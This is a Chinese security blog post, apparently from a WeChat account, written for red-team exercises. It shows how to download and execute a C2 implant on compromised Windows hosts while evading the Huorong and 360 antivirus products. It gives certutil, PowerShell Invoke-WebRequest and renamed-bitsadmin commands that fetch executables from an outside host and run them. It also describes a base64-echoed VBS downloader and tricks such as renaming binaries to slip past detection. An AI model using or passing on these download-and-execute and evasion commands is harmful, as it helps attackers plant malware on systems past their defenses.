点击蓝字 · 关注我们
背景
一年一度的HVV又要开始啦,在内网横向的时候,可能在Webshell 上传大文件、或SMBEXEC、xp_cmdshell 执行的时候,需要利用系统自带的下载命令,直接下载C2马执行。
我在这里就不说如何用DOS命令写执行文件了,(主要利用certutil 进行加密,分段写入,再利用certutil解密还原)再做下载了,遇到稍微大一些的文件,着实有点费劲。
certutil Bypass
普通下载
certutil -urlcache -split -f http://xxx/calc.exe
C:windowstempupdates.exe
可以看到防护项目,指出我们利用Certutil 下载了可执行文件,那么我们下载非执行文件是否就可以了呢?
certutil -urlcache -split -f http://x/calc.txt
C:windowstempupdates.txt &&
C:windowstempupdates.txt
直接把下载的可执行文件,改成txt,火绒就可以Bypass了
(可见这里火绒拦截的只是下载文件的后缀格式,是否为可执行文件)
但是,当我们遇到了360,并不好使!!! 风险内容为:certutil 木马下载工具,那是识别出我的命令?
这个最后解决挺佛系的, 首先我们要copy 一份 certutil 到任意目录 任意文件名,保持不变也没有关系
为了运行certutil时 不在system32目录下运行,
1.首先正常执行一遍,不要带任何参数,
2.第二遍再带参数 360就不拦截啦
Powershell download
powershell -c "Invoke-WebRequest -uri
http://x:80/download/sv.exe -OutFile
C:windowstasksx.exe"
Powerhsell 如果执行的第一条没有被绕过,那么接下来执行Whomai 也会被ban
针对360的拦截,需要把powershell 名称修改掉,由于我这里的下载网址不存在,Webrequest的操作还是执行了的(但是很多情况 对powershell 拦截的着实很严重,有更好的方法,师傅们可以加我们内部创建的群,互相交流下),powershell 可以和环境变量花式玩起来。
Bitsadmin
bb.exe /transfer n
https://www.baidu.com/img/flexible/logo/pc/result.png %LOCALAPPDATA%Temp1.txt
当我把详细信息的bitsadmin 删除后
我的下载就可以正常执行了,某数字AV就对我放行了。所以杀的并不是行为,只是特征!
但是在DOS下对详细信息的处理也不是很轻松,具体还是要看大家当时的环境和需求,支持个怎么样的玩法吧。
手写VBS进行下载
cscript down.vbs
http://www.baidu.com/img/dong_528d34b686d4889666f77c62b9a65857.gif 1.jpg
这里要求对VBS免杀就可以了,火绒和360都是没有拦截的。
那么环境再苛刻一点,只有一个Shell会话,这13行代码如何在命令行中echo 到目标呢?
本地做好base64加密
手动去除注释信息,和换行,拼接为一行,直接echo 写入目标,再用certutil -decode 做解密即可正常使用。
这里写的还算是比较短的了,如果有更好的方法,希望师傅们可以加我们内部群共同讨论。
VBS脚本可转发朋友圈并关注公众号 回复EDI-VBS 进行下载
本文始发于微信公众号(EDI安全):Hvv- Windows 下载执行命令 Bypass
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论